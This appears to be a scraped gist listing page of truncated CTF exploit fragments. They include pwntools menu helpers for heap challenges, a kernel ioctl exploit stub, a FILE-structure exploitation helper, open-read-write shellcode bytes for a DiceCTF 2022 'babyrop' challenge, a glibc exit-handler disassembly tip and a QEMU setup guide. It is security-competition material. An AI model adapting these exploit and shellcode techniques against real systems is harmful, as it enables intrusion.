

from pwn import *
def menu(n):
    """Select menu entry *n*: wait for the ">> " prompt, then send the choice as a line.

    ``r`` is the tube to the target process; it is presumably opened elsewhere
    in the script (not visible here).
    """
    # sendlineafter() is pwntools' recvuntil() followed by sendline(), in one call.
    r.sendlineafter(">> ", str(n))
def add(idx, size, payload):
menu(1)
r.recvuntil("Enter the index:\n")
r.sendline(str(idx))
from pwn import *
def init(s):
    """Answer the "Input name: " prompt with *s*, sent as one line.

    ``io`` is the tube to the target; it is presumably created elsewhere in the
    script.
    """
    # Equivalent to recvuntil("Input name: ") followed by sendline(s).
    io.sendlineafter("Input name: ", s)
def menu(n):
    """Select menu entry *n*: wait for the "Choice: " prompt (including its newline),
    then send the choice as a line.

    ``io`` is the tube to the target; it is presumably created elsewhere in the
    script.
    """
    # sendlineafter() = recvuntil() + sendline(); the delimiter keeps the trailing
    # newline the original waited for.
    io.sendlineafter("Choice: \n", str(n))
# -*- coding:utf-8 -*-
from pwn import *
def menu(n):
    """Select menu entry *n*: wait for the "Your choice: " prompt, then send the
    choice as a line.

    ``io`` is the tube to the target; it is presumably created elsewhere in the
    script.
    """
    # sendlineafter() is pwntools' recvuntil() followed by sendline().
    io.sendlineafter("Your choice: ", str(n))
def malloc(sz, s):
menu(1)
io.recvuntil("Size: ")
# -*- coding:utf-8 -*-
from pwn import *
IOCTL_READ = 901
IOCTL_WRITE = 902
OFFSET_COMM = 0x408
OFFSET_TASKS = 0x210
e = ELF('./vmlinux')
# coding: utf-8
from pwn import *
def menu(s):
    """Wait for the "> " prompt, then send *s* as a line.

    Unlike the other menu helpers on this page, *s* is sent verbatim (no
    ``str()`` conversion). ``io`` is the tube to the target; it is presumably
    created elsewhere in the script.
    """
    # sendlineafter() is pwntools' recvuntil() followed by sendline().
    io.sendlineafter("> ", s)
def write(s):
    """Pick the "w" menu entry, then send *s* as the next line.

    ``io`` is the tube to the target; it is presumably created elsewhere in the
    script.
    """
    # Same exchange as menu("w"): wait for the "> " prompt, then send "w".
    io.sendlineafter("> ", "w")
    # The payload line follows immediately; nothing is read in between.
    io.sendline(s)
# -*- coding:utf-8 -*-
from pwn import *
# based on https://dhavalkapil.com/blogs/FILE-Structure-Exploitation/
def pack_file(_flags = 0,
_IO_read_ptr = 0,
_IO_read_end = 0,
_IO_read_base = 0,
_IO_write_base = 0,
soez / babyrop.py
Last active February 6, 2022 22:56
babyrop_DiceCTF-2022
from pwn import *
import binascii
# open-read-write file
filename = "flag.txt"
body = "\x5f" # pop rdi
body += "\x80\x77" + chr(len(filename)) + "\x41" # xor byte [rdi + 11], 0x41 ; 11 = len(/etc/passwd)
body += "\x48\x31\xf6" # xor rsi, rsi
body += "\x48\x31\xc0" # xor rax, rax
soez / cache.py
Last active February 14, 2022 09:25
Defcamp-CTF-2022_cache
from pwn import *
local = False  # presumably switches between a local process and a remote target further down — confirm against the rest of the script
libc = ELF("./libc.so.6", checksec = False)  # checksec=False skips pwntools' checksec printout when the ELF is loaded
binary = ELF("./vuln", checksec = False)  # the target binary, loaded the same way
def menu(n):
    """Select menu entry *n*: wait for the "\\nChoice: " prompt, then send the
    choice as a line.

    ``io`` is the tube to the target; it is presumably created elsewhere in the
    script.
    """
    # sendlineafter() is pwntools' recvuntil() followed by sendline(); the
    # delimiter keeps the leading newline the original waited for.
    io.sendlineafter("\nChoice: ", str(n))
soez / Tip
Last active September 13, 2022 18:35
# Glibc 2.35 Ubuntu 22.04
When `exit` is called, execution passes through here (explained with ASLR disabled, so the addresses shown are fixed):
0x7ffff7daa390 <__run_exit_handlers>: endbr64
0x7ffff7daa394 <__run_exit_handlers+4>: push r15
0x7ffff7daa396 <__run_exit_handlers+6>: push r14
0x7ffff7daa398 <__run_exit_handlers+8>: push r13
0x7ffff7daa39a <__run_exit_handlers+10>: push r12
0x7ffff7daa39c <__run_exit_handlers+12>: mov r12,rsi
0x7ffff7daa39f <__run_exit_handlers+15>: push rbp
soez / mips64el-debian-qemu-exact-steps.md
Created September 24, 2022 06:48 — forked from bradfa/mips64el-debian-qemu-exact-steps.md
mips64el Debian QEMU install

Installing Debian Stretch mips64el Using QEMU

We're going to emulate the mips64el "malta" machine and install Debian Stretch using QEMU on an amd64 Debian Buster host.

You will likely need your user to be in the "libvirt" group and to have these packages (or a subset of them) installed:

sudo apt install qemu-system-mips virt-manager libguestfs-tools